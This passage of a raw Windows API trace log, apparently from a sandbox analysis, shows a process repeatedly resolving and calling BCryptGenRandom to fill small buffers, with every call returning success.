(in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01c7b, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a01c7b) returned 0x0 [0240.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01c97, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a01c97) returned 0x0 [0240.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.318] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.318] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.319] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.319] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.319] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.319] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.319] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.321] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.321] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.321] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01cbb, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x3a01cbb) returned 0x0 [0240.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0240.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01ccd, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a01ccd) returned 0x0 [0240.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0240.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0240.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0240.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0240.679] 